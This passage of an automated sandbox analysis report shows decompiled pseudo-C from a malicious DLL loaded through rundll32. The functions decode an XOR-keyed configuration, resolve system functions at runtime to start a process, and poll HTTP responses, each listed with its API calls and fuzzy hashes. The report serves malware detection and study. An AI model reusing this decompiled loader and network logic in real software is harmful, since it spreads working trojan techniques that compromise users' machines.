				if(E04444451( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x444a31c; // 0x69b25f44
				_push(_t115);
				if(E04444451( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x444a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x444a31c; // 0x69b25f44
						_t45 = E0444572F(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x444a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x444a31c; // 0x69b25f44
						_t46 = E0444572F(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x444a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x444a31c; // 0x69b25f44
						_t47 = E0444572F(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x444a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x444a31c; // 0x69b25f44
						_t48 = E0444572F(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x444a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x444a31c; // 0x69b25f44
						_t49 = E0444572F(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x444a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x444a31c; // 0x69b25f44
						_t50 = E0444572F(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x444a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x444a31c; // 0x69b25f44
								_t51 = E0444572F(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E04441760(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04444DFF();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x444a31c; // 0x69b25f44
								_t52 = E0444572F(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E04441760(0, _t52) != 0) {
								_t121 =  *0x444a3cc; // 0x4f495b0
								E04441000(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x444a31c; // 0x69b25f44
								_t53 = E0444572F(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x444a320; // 0xafd5a8
								_t22 = _t54 + 0x444b252; // 0x616d692f
								 *0x444a370 = _t22;
								goto L60;
							} else {
								_t64 = E04441760(0, _t53);
								 *0x444a370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x444a31c; // 0x69b25f44
										_t56 = E0444572F(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x444a320; // 0xafd5a8
										_t23 = _t57 + 0x444b791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E04441760(0, _t56);
									}
									 *0x444a3e0 = _t58;
									HeapFree( *0x444a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                    0x04444ef3
                    0x04444ef3
                    0x04444ef3
                    0x04444ef3
                    0x04444ef6
                    0x04444f13
                    0x04444f21
                    0x04444f21
                    0x04444f26
                    0x04444f40
                    0x044451ae
                    0x044451b5
                    0x044451b9
                    0x044451b9
                    0x04444f46
                    0x04444f4b
                    0x04444f63
                    0x0444519b
                    0x044451a5
                    0x00000000
                    0x04444f69
                    0x04444f69
                    0x04444f6a
                    0x04444f6f
                    0x04444f85
                    0x04444f71
                    0x04444f71
                    0x04444f7e
                    0x04444f7e
                    0x04444f89
                    0x04444f90
                    0x04444f92
                    0x04444f9c
                    0x04444fa1
                    0x04444fa1
                    0x04444f9c
                    0x04444fa8
                    0x04444fbe
                    0x04444faa
                    0x04444faa
                    0x04444fb7
                    0x04444fb7
                    0x04444fc2
                    0x04444fc4
                    0x04444fce
                    0x04444fd3
                    0x04444fd3
                    0x04444fce
                    0x04444fda
                    0x04444ff0
                    0x04444fdc
                    0x04444fdc
                    0x04444fe9
                    0x04444fe9
                    0x04444ff4
                    0x04444ff6
                    0x04445000
                    0x04445005
                    0x04445005
                    0x04445000
                    0x0444500c
                    0x04445022
                    0x0444500e
                    0x0444500e
                    0x0444501b
                    0x0444501b
                    0x04445026
                    0x04445028
                    0x04445032
                    0x04445037
                    0x04445037
                    0x04445032
                    0x0444503e
                    0x04445054
                    0x04445040
                    0x04445040
                    0x0444504d
                    0x0444504d
                    0x04445058
                    0x0444505a
                    0x04445064
                    0x04445069
                    0x04445069
                    0x04445064
                    0x04445070
                    0x04445086
                    0x04445072
                    0x04445072
                    0x0444507f
                    0x0444507f
                    0x0444508a
                    0x0444509d
                    0x0444509d
                    0x00000000
                    0x0444508c
                    0x0444508c
                    0x04445096
                    0x00000000
                    0x044450a7
                    0x044450a7
                    0x044450a9
                    0x044450bf
                    0x044450ab
                    0x044450ab
                    0x044450b8
                    0x044450b8
                    0x044450c3
                    0x044450c5
                    0x044450c8
                    0x044450c9
                    0x044450d0
                    0x044450d2
                    0x044450d3
                    0x044450d3
                    0x044450d0
                    0x044450da
                    0x044450f0
                    0x044450dc
                    0x044450dc
                    0x044450e9
                    0x044450e9
                    0x044450f4
                    0x04445102
                    0x0444510c
                    0x0444510c
                    0x04445114
                    0x0444512a
                    0x04445116
                    0x04445116
                    0x04445123
                    0x04445123
                    0x0444512e
                    0x04445141
                    0x04445141
                    0x04445146
                    0x0444514c
                    0x00000000
                    0x04445130
                    0x04445133
                    0x0444513a
                    0x0444513f
                    0x04445151
                    0x04445153
                    0x04445169
                    0x04445155
                    0x04445155
                    0x04445162
                    0x04445162
                    0x0444516d
                    0x04445179
                    0x0444517e
                    0x0444517e
                    0x0444516f
                    0x04445172
                    0x04445172
                    0x0444518c
                    0x04445191
                    0x04445197
                    0x00000000
                    0x0444519a
                    0x00000000
                    0x0444513f
                    0x0444512e
                    0x04445096
                    0x0444508a

                    APIs
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04444F98
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04444FCA
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04444FFC
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0444502E
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04445060
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0444A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04445092
                    • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04445191
                    • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 044451A5
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 926d2f93c430c8aec1434e53737f2c35f2bcb9189978206d26991321371297a2
                    • Instruction ID: c0d70d79e3c24c119255a15cf0bfd582791c13329a6d3bb114e8adcc5164b72c
                    • Opcode Fuzzy Hash: 926d2f93c430c8aec1434e53737f2c35f2bcb9189978206d26991321371297a2
                    • Instruction Fuzzy Hash: 81816379B40204BBFF20DBB59C88D5BB7E9EBC87457244927A201E7205FA39F9419760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444196A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E0444196A(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E0444624F(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04447961( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x444a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x444a320; // 0xafd5a8
					_t18 = _t47 + 0x444b3e6; // 0x73797325
					_t68 = E04441E10(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x444a320; // 0xafd5a8
						_t19 = _t50 + 0x444b747; // 0x4f48cef
						_t20 = _t50 + 0x444b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04446381();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04446381();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x444a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E044417AB(_t70);
				goto L12;
			}


















                    0x04441972
                    0x04441972
                    0x04441981
                    0x0444198a
                    0x0444198d
                    0x04441a9a
                    0x04441aa1
                    0x04441aa1
                    0x0444199c
                    0x044419a4
                    0x044419a9
                    0x044419ac
                    0x044419c1
                    0x044419c7
                    0x044419c8
                    0x044419cb
                    0x044419d1
                    0x044419d4
                    0x044419d9
                    0x044419e1
                    0x044419ed
                    0x044419f1
                    0x04441a81
                    0x044419f7
                    0x044419f7
                    0x044419fc
                    0x04441a03
                    0x04441a17
                    0x04441a1b
                    0x04441a6a
                    0x04441a1d
                    0x04441a1e
                    0x04441a25
                    0x04441a3e
                    0x04441a40
                    0x04441a44
                    0x04441a4b
                    0x04441a65
                    0x04441a4d
                    0x04441a56
                    0x04441a5b
                    0x04441a5b
                    0x04441a4b
                    0x04441a79
                    0x04441a79
                    0x044419f1
                    0x04441a88
                    0x04441a91
                    0x04441a95
                    0x00000000

                    APIs
                      • Part of subcall function 0444624F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04441986,?,?,?,?,00000000,00000000), ref: 04446274
                      • Part of subcall function 0444624F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04446296
                      • Part of subcall function 0444624F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 044462AC
                      • Part of subcall function 0444624F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044462C2
                      • Part of subcall function 0444624F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044462D8
                      • Part of subcall function 0444624F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044462EE
                    • memset.NTDLL ref: 044419D4
                      • Part of subcall function 04441E10: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,044419ED,73797325), ref: 04441E21
                      • Part of subcall function 04441E10: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04441E3B
                    • GetModuleHandleA.KERNEL32(4E52454B,04F48CEF,73797325), ref: 04441A0A
                    • GetProcAddress.KERNEL32(00000000), ref: 04441A11
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04441A79
                      • Part of subcall function 04446381: GetProcAddress.KERNEL32(36776F57,0444793C), ref: 0444639C
                    • CloseHandle.KERNEL32(00000000,00000001), ref: 04441A56
                    • CloseHandle.KERNEL32(?), ref: 04441A5B
                    • GetLastError.KERNEL32(00000001), ref: 04441A5F
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                    • String ID: Ut
                    • API String ID: 3075724336-8415677
                    • Opcode ID: 68b656cdbb5ffc13cf098c3656afb8c365bb64975f88744ce27674362e735930
                    • Instruction ID: 58d3c97a53958af2995f06b4966df73ae54b3fd60822865de3ec2b1716584774
                    • Opcode Fuzzy Hash: 68b656cdbb5ffc13cf098c3656afb8c365bb64975f88744ce27674362e735930
                    • Instruction Fuzzy Hash: AB314FB6900218AFFF10AFA5DC88D9FBBBCEB88344F00456AE505B7151DB34AE859B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444266A Relevance: 13.6, APIs: 9, Instructions: 145stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 43%
                    			E0444266A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x444a3dc; // 0x4f49c00
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E04442E72();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E04442E72();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E04442F7B(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E04442F7B(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E04441289(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x444918c;
						}
						_t70 = E04441DDD(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E044463FD(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x444a320; // 0xafd5a8
								_t102 =  *0x444a134; // 0x4447ca9
								_t28 = _t105 + 0x444bb08; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E04441289(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x4449190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E044463FD(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E044417AB(_v24);
								} else {
									_t92 =  *0x444a320; // 0xafd5a8
									_t44 = _t92 + 0x444bc80; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E044417AB(_v8);
						}
						E044417AB(_v12);
					}
					E044417AB(_v16);
				}
				return _v28;
			}



































                    0x04442670
                    0x04442678
                    0x0444267b
                    0x04442688
                    0x0444268b
                    0x04442692
                    0x04442699
                    0x0444269c
                    0x044426a9
                    0x044426ac
                    0x044426af
                    0x044426b6
                    0x044426b9
                    0x044426c1
                    0x044426c8
                    0x044426cb
                    0x044426d1
                    0x044426d5
                    0x044426de
                    0x044426e2
                    0x044426e4
                    0x044426e4
                    0x044426ec
                    0x044426f3
                    0x044426f6
                    0x044426fc
                    0x04442703
                    0x04442714
                    0x0444271b
                    0x0444272d
                    0x04442734
                    0x04442737
                    0x04442740
                    0x04442749
                    0x04442752
                    0x04442768
                    0x0444276d
                    0x04442771
                    0x04442775
                    0x0444277c
                    0x0444277f
                    0x04442781
                    0x04442781
                    0x0444278b
                    0x04442794
                    0x0444279b
                    0x044427b7
                    0x044427bb
                    0x044427f4
                    0x044427bd
                    0x044427c0
                    0x044427c8
                    0x044427d9
                    0x044427e1
                    0x044427e9
                    0x044427ed
                    0x044427ed
                    0x044427bb
                    0x044427fc
                    0x044427fc
                    0x04442804
                    0x04442804
                    0x0444280c
                    0x0444280c
                    0x04442818

                    APIs
                    • GetTickCount.KERNEL32 ref: 04442682
                    • lstrlen.KERNEL32(00000000,00000005), ref: 04442703
                    • lstrlen.KERNEL32(?), ref: 04442714
                    • lstrlen.KERNEL32(00000000), ref: 0444271B
                    • lstrlenW.KERNEL32(80000002), ref: 04442722
                    • lstrlen.KERNEL32(?,00000004), ref: 0444278B
                    • lstrlen.KERNEL32(?), ref: 04442794
                    • lstrlen.KERNEL32(?), ref: 0444279B
                    • lstrlenW.KERNEL32(?), ref: 044427A2
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$CountFreeHeapTick
                    • String ID:
                    • API String ID: 2535036572-0
                    • Opcode ID: 8d2d786b4be42e48342835763fa93591d396449b5ad5d5140433a5fb5047c55a
                    • Instruction ID: de28b8b852461a5c9e591bb7792d848fee9aee5405326059a066ea55f8800644
                    • Opcode Fuzzy Hash: 8d2d786b4be42e48342835763fa93591d396449b5ad5d5140433a5fb5047c55a
                    • Instruction Fuzzy Hash: 2F51C076D00219AFEF11AFA5CC44A9E7BB1FF84354F05406AF904A7211DB35AE11DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044458EE Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E044458EE(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E044463FD(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E044417AB(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04445867( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                    0x044458ee
                    0x044458ee
                    0x044458fe
                    0x04445901
                    0x04445905
                    0x0444590d
                    0x04445910
                    0x04445929
                    0x0444593d
                    0x04445944
                    0x0444594b
                    0x0444599e
                    0x044459a7
                    0x044459aa
                    0x044459e5
                    0x044459eb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x044459aa
                    0x04445951
                    0x00000000
                    0x04445958
                    0x04445966
                    0x04445969
                    0x0444596c
                    0x04445978
                    0x0444597c
                    0x044459de
                    0x0444597e
                    0x04445990
                    0x044459ce
                    0x044459d9
                    0x04445992
                    0x04445995
                    0x04445999
                    0x04445999
                    0x04445990
                    0x00000000
                    0x0444597c
                    0x04445951
                    0x04445915
                    0x0444591b
                    0x04445920
                    0x04445923
                    0x00000000
                    0x00000000
                    0x00000000
                    0x044459b3
                    0x044459bb
                    0x044459c2
                    0x044459c2
                    0x00000000

                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04445905
                    • SetEvent.KERNEL32(?), ref: 04445915
                    • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04445947
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0444596C
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0444598C
                    • GetLastError.KERNEL32 ref: 0444599E
                      • Part of subcall function 04445867: WaitForMultipleObjects.KERNEL32(00000002,04447AF8,00000000,04447AF8,?,?,?,04447AF8,0000EA60), ref: 04445882
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    • GetLastError.KERNEL32(00000000), ref: 044459D3
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                    • String ID:
                    • API String ID: 3369646462-0
                    • Opcode ID: 4425c94a8e590ada960727623c2ad06a3a0119585a94095d38522f0c5a98eb50
                    • Instruction ID: 6341f68dc02119107bc876f667012025f16fd68136df821ad225b7e5d49ef258
                    • Opcode Fuzzy Hash: 4425c94a8e590ada960727623c2ad06a3a0119585a94095d38522f0c5a98eb50
                    • Instruction Fuzzy Hash: 4531EAB5900309FFFF21DFE5C884A9FB7B8EB48354F10496AE641A2241D735AA459B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04444CA7 Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SysAllocString.OLEAUT32(00000000), ref: 04444D03
                    • SysAllocString.OLEAUT32(0070006F), ref: 04444D17
                    • SysAllocString.OLEAUT32(00000000), ref: 04444D29
                    • SysFreeString.OLEAUT32(00000000), ref: 04444D8D
                    • SysFreeString.OLEAUT32(00000000), ref: 04444D9C
                    • SysFreeString.OLEAUT32(00000000), ref: 04444DA7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: 6bf4cabb0e2b07060199af3f51031512520b97b9195fa98e6d4dc733b7e8efb1
                    • Instruction ID: 3c72510a349b8edeabe9792f6ca55d8523716028ac74b77fd8035e0d40d243fd
                    • Opcode Fuzzy Hash: 6bf4cabb0e2b07060199af3f51031512520b97b9195fa98e6d4dc733b7e8efb1
                    • Instruction Fuzzy Hash: EE315E72D00609AFEF01DFB8C844A9FB7B6EF89310F144425E910EB210DB75AD05CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444624F Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0444624F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E044463FD(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x444a320; // 0xafd5a8
					_t1 = _t23 + 0x444b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x444a320; // 0xafd5a8
					_t2 = _t26 + 0x444b769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E044417AB(_t54);
					} else {
						_t30 =  *0x444a320; // 0xafd5a8
						_t5 = _t30 + 0x444b756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x444a320; // 0xafd5a8
							_t7 = _t33 + 0x444b40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x444a320; // 0xafd5a8
								_t9 = _t36 + 0x444b4d2; // 0x4e6c7452
